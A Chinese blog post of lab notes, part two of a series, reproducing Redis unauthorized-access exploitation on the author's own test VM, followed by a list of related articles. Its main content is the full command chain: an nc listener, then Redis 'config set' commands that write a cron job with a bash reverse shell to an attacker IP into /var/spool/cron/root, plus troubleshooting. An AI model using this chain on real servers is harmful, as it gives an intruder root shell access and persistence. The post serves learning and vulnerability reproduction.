《Redis未授权访问getshell》复现笔记（二）

最新推荐文章于 2024-12-19 20:23:10 发布

limb0

最新推荐文章于 2024-12-19 20:23:10 发布

阅读量542

点赞数

分类专栏：学习笔记

本文链接：https://blog.youkuaiyun.com/limb0/article/details/100878699

版权

本文详细记录了复现Redis未授权访问并利用crontab反弹shell的过程，包括环境介绍、复现步骤、遇到的问题及解决办法。在尝试写入命令和定时任务后，通过排查错误，最终成功反弹shell。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

《Redis未授权访问getshell》复现笔记（二）

复现完了写马getshell，我们再来复现一下利用crontab反弹shell：
使用nc.exe在攻击机上监听9999端口：

nc –lvvp 9999

在这里插入图片描述
还是使用Redis Clinet写入如下命令

config set dir /var/spool/cron
config set dbfilename root
set xxx "\n\n\n* * * * * /bin/bash -i>&/dev/tcp/192.168.8.195/9999 0>&1\n\n\n"
save

在这里插入图片描述
等待一分钟……（10分钟过去了）
emmm……
不要慌，一步一步的排查问题：

service crond status  #确认服务器是否开启定时任务计划服务
cat /var/spool/cron/root  #查看我们输入的代码是否插入到定时任务文件
tail -f /var/log/cron  #查看crontab的日志

在这里插入图片描述
通过查看日志，我们发现报错信息：bad minute(错误的时间)，难道是因为执行语句前后的乱码导致cron无法正常读取文件中的命令？
我们vim /var/spool/cron/root手动修改root文件试试看，

等待一分钟，成功反弹shell！

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

limb0

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

二十八种未授权访问漏洞合集（暂时最全）

墨痕诉清风的博客

01-04

5189

目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 0x06 Dubbo 未授权访问 0x07 Druid 未授权访问 0x08 Elasticsearch 未授权访问 0x09 FTP 未授权访问 0x10 HadoopYARN 未授权访问 0x11 JBoss 未授权访问 0x12 Jenkins 未授权访问 0x13 Jupyt

2024.03.11--redis未授权漏洞和PHP反序列化

sev1n的博客

03-13

1248

不定期分享学习笔记

参与评论您还未登录，请先登录后发表或查看评论

《Redis未授权访问getshell》复现笔记（一）

limb0的博客

09-12

799

《Redis未授权访问getshell》复现笔记（一）利用周末复现了一下Redis未授权访问getshell，期间遇到了一些坑，虽然结果没什么悬念，却花费了不少时间，故将过程详细记录，留给有需要的人。此贴仅供新手参考，大佬勿喷。一、环境介绍靶机：CentOS 6.5 （点击下载） IP：192.168.17.140 攻击机：Win10（本机） IP：192.168.8.195 二、...

redis未授权到getshell

weixin_68408599的博客

06-12

1401

写入webshell虽然简单便捷，但是很多网站都严格限制了写入规则，但是可以通过定时任务，写入公钥等来获取webshell并建立持久性控制。自己使用需要小心，redis未授权是比较常见的漏洞了，常常被用于执行挖矿病毒，甚至是勒索病毒。

Redis未授权访问导致getshell

isxiaole的博客

11-09

3449

redis未授权访问导致getshell redis未授权访问漏洞利用

redis 未授权访问及getshell

Guoke324的博客

04-06

832

目录 redis未授权访问 redis getshell方法写 webshell 文件利用写SSH key进行 getshell 通过写corntab的方式进行getshell redis未授权访问 Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。利用python去检测，或者...

redis 未授权访问拿shell

blackguest07的博客

03-18

1098

redis未授权访问拿shell

【Web】超级详细的Linux权限提升一站式笔记

最新发布

web13508588635的博客

12-19

1014

SUID是一种特殊权限，设置了suid的程序文件，在用户执行该程序时，用户的权限是该程序文件属主的权限，例如程序文件的属主是root，那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似，只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置，它就是设置了suid权限的注意以下几点：1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2. 命令执行者要对该程序文件拥有执行(x)权限.

Redis 未授权访问与Get Shell漏洞

K1ose的博客

11-20

1107

Redis 未授权访问与Get Shell漏洞漏洞原理与危害 Redis默认情况下，会绑定在默认端口，如果没有采用相关策略，例如 ①防火墙拦截非信任IP ②端口屏蔽会将Redis服务器暴露在公网上，如果没有设置口令认证，会导致任意用户在访问目标服务器时能够未经授权便访问Redis以及其数据。利用Redis自身提供的config命令进行写文件操作，可以将自己的SSH公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中，进而可以使用对应私钥直接使用ssh服务登陆目标

Redis 未授权访问漏洞与getshell（附getshell检测工具）

告白的博客

02-24

4307

Redis 简介. Redis 是完全开源免费的，遵守 BSD 协议，是一个灵活的高性能 key-value 数据结构存储，常见用来作为数据库，其在安全配置问题上存在一些问题，如常见的未授权范围与Pickle反序列化

Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell

05-05

Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab

redis未授权访问getshell的方式

居上

06-28

2111

redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库端口：6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis未授权访问 Redis默认情况下，会绑定在0.0.0.0:6379，如果没有采用相关的策略，如配置防火墙规则避免其他非信任来源的IP访问，就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red

redis未授权漏洞三大getshell姿势

weixin_67289581的博客

10-17

1633

Redis未授权漏洞是指在默认配置下，Redis服务器会绑定在0.0.0.0:6379端口，如果没有设置密码认证（通常为空），并且没有采取相关的安全策略，如添加防火墙规则来限制访问，那么Redis服务可能会暴露在公网上，导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

Redis未授权访问漏洞复现

Armandhe的博客

06-01

1192

redis未授权访问漏洞的复现、利用条件、防御措施、

redis未授权getshell四种方式

没有

04-24

6056

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上，然后在从机上加载so文件，我们就可以执行拓展的新命令了。

redis未授权访问getshell

weixin_30567471的博客

12-12

172

redis未授权访问的问题一年前就爆了，当时刚开始学安全，还不太懂。今天借着工作的机会来搞一把，看看能不能拿下一台服务器。其实前几天就写好了一直想找个实际环境复现一下，一直没有找到，只说下大致思路。首先redis未授权的漏洞有几个先决条件，自己搭建漏洞环境的话需要在配置文件redis.conf中修改 1、允许其他网段连接 2、关闭protected-mode 漏洞的发现可以批量跑POC，...

漏洞复现之Redis未授权访问

m0_56190544的博客

09-13

2819

本文详细介绍了redis未授权访问漏洞的原理以及利用方法，供大家参考学习

记录一次Redis未授权getshell几种常见方法

qq_45888826的博客

09-17

4016

记录一次Redis未授权getshell几种常见方法

redis未授权访问漏洞复现学习

0nc3的博客

12-14

467

0x00 前言前段时间看到想复现学习一下，然后就忘了越临近考试越不想复习链接：https://xz.aliyun.com/t/6103#toc-53 0x01 常见的未授权访问漏洞 Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 Memcached 未授权访问漏洞 JBOSS未授权访问漏洞 VNC 未授权访问漏洞 Docker 未授权访问漏洞 ...